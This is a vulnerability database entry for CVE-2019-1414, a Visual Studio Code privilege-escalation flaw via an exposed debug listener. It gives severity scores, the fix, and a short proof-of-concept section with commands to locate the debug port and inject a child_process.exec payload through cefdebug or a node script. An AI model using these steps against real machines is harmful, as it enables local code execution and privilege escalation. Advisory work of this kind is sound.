Attacker Value
Very High
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
0

CVE-2019-1414

Disclosure Date: January 24, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer, aka ‘Visual Studio Code Elevation of Privilege Vulnerability’.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

Vulnerability:

  • An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer. A local attacker who successfully exploited the vulnerability could inject arbitrary code to run in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Software Versions Affected:

  • All versions < 1.39.1

Vulnerability Severity:

  • High

Vulnerability Fix:

  • Upgrade VS Code to version 1.39.1 or later.

Vulnerability POC:

  • If Visual Studio code runs as Administrator, privileges can be elevated to the highest level, i.e. NT AUTHORITY\SYSTEM.
  • If Visual Studio Code runs as another user, command execution can be achieved as that user.
  • If Visual Studio Code runs in High Integrity context, any UAC settings can bypassed and can elevate from Low/Medium levels.

  • Linux (Article detailing the exploit):
    1. ps aux | grep inspect
      • Find the debug port
    2. node index.js 127.0.0.1 <PORT> <COMMAND>
      • Run index.js supplied with the ip address, port, and command you want to run

  • Windows:
    1. ./cefdebug.exe
      • Find the debug port
      • cefdebug is a minimal commandline utility and/or reference code for using libwebsockets to connect to an electron/CEF/chromium debugger.
        2 ./cefdebug.exe —url ws://127.0.0.1:<PORT>/<UUID> —code “process.mainModule.require(‘child_process’).exec(’<COMMAND>’)”
      • Run cefdebug supplied with the debug websocket url and the command you want to run
CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • visual studio code

Additional Info

Technical Analysis